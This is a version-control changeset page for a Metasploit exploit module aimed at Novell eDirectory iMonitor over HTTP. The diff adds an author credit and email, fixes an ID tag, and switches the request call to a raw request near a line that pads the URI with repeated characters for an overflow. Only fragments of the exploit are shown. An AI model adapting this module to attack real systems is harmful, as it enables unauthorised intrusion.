Changeset 5509

Show
Ignore:
Timestamp:
05/20/08 15:55:01 (4 months ago)
Author:
pusscat
Message:

Added a fix

Files:

Legend:

Unmodified
Added
Removed
Modified
Copied
Moved
  • framework3/trunk/modules/exploits/windows/http/edirectory_imonitor.rb

    r4419 r5509  
    11## 
    2 # $Id:
     2# $Id
    33## 
    44 
     
    2828                                         
    2929                        }, 
    30                         'Author'         => [ 'anonymous' ], 
     30                        'Author'         => [ 'anonymous', 'Matt Olney <scacynwrig@yahoo.com>' ], 
    3131                        'License'        => BSD_LICENSE, 
    3232                        'Version'        => '$Revision$', 
     
    7373                uri << "B" * 0xD0 
    7474                 
    75                 res = c.send_request(c.request({ 'uri' => uri }), -1
     75                res = c.send_request(c.request_raw({ 'uri' => uri })
    7676                sleep(4) 
    7777